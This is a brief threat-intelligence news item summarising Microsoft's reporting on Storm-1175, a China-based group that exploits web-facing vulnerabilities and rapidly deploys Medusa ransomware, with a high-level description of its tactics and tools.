STORM- 1175, a China‑based actor, conducts fast ransomware operations, exploiting newly disclosed flaws in web‑facing systems to gain initial access and then rapidly moves to deploy Medusa ransomware, sometimes within 24 hours. According to Microsoft, the group has exploited more than 16 vulnerabilities since 2023, targeting platforms such as Microsoft Exchange, Ivanti, ConnectWise, JetBrains and others, often weaponising flaws before patches are applied.
The attackers chain multiple exploits to achieve deeper access, including remote code execution on Windows and Linux systems, and they have used zero‑days prior to public disclosure in some cases. After gaining access, Storm‑1175 installs web shells or remote tools, creates admin accounts, moves laterally using PowerShell, PsExec, RDP and Cloudflare tunnels, and absconds with credentials via tools like Impacket and Mimikatz.
They also weaken security by modifying antivirus settings and exfiltrate data using tools such as Rclone before deploying Medusa across the network. Storm‑1175 has been observed deploying Medusa ransomware using PDQ Deployer or Group Policy, and Microsoft provided IoCs and mitigation guidance for these attacks.